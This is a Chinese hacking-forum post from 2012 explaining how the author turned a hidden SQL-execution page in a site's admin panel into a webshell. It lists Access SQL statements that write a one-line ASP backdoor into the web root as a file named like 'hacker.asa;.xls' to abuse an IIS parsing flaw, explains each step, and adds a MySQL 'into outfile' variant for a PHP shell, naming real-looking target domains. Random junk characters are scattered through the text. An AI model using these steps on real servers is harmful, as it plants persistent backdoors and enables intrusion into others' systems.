好不容易进了后台,发现啥上传啊。备份啊多木有。9 `& g; T) ]# h) T
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的6 X& G, e& g8 a) R
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
# |4 j* H7 M! V1 `6 s% h然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下: K/ F/ \5 z. C. x' o: c& I
1.create table cmd (a varchar(50))
7 B8 P; T& p0 o, \* k, b2.insert into cmd (a) values (‘‘)
9 _8 U1 g$ z( w5 K* G* \3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
$ B, V s% Y2 I7 ~# f! ~! Z(把表cmd的内容导出为物理路径的一个EXCEL文件)) Q e3 `, E! e/ p4 ~/ `
4.drop table cmd
9 K, Q& J: _) k v$ F利用IIS的BUG成功拿到了WEBSHELL。
; ?! P& r8 P3 y2 b) j$ z/ M+ z' i5 b' M! w+ R$ y
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
" f p7 A) L8 V
( [# c0 ?8 x7 ^' m* w5 a; |5 r SQL语句意思解释:8 d) P/ R6 P* W* P8 a- Q
第一句, s/ O$ X0 H; Z' Y% {) p, E3 H! }
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
# s; I; s1 P1 S" F/ P' z
) Q* q$ g- ~& r d8 J d 第二句
% y$ ^* |6 T; n 在表cmd的a字段插入一句话木马
5 E& n( z, |6 w2 b* n F. K4 \3 x 第三句8 y, r! C" [$ V! ^+ i4 Q
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件9 o" g1 F8 ^7 \1 S! a
; W; x8 ^* y: i4 T ~ 第四句
6 k$ R. u8 k0 O q0 [' O 删除建立的cmd表, ?& h5 p X/ |" e% V% G
5 p: A, j5 _8 M! g$ D! g1 p4 X! x
以下内容为测试:
$ T2 \6 H: K, a) L$ g- v3 u* ^ Access利用后台SQL执行命令功能导出WebShell:
7 }& q3 s; i# G$ C 这个更简单:4 C7 A% X0 I# q8 k2 F; J; `
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]$ O0 _ W/ I5 l! ?
或者' e0 f# |% E, n) W, K" p
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]4 M1 |3 ~8 O! w. I/ d
8 H1 n# s1 ~6 P3 ~% e# N9 J
后台有执行SQL语句功能(vote为已知表段)
# \ Z9 [ Z v3 r, y9 n 希望对大家有所帮助拿shell的又一个思路
" [: w" q/ Z. W) g8 a. A$ ]) F |
发表于 2012-9-13 17:53:58
收藏
支持
反对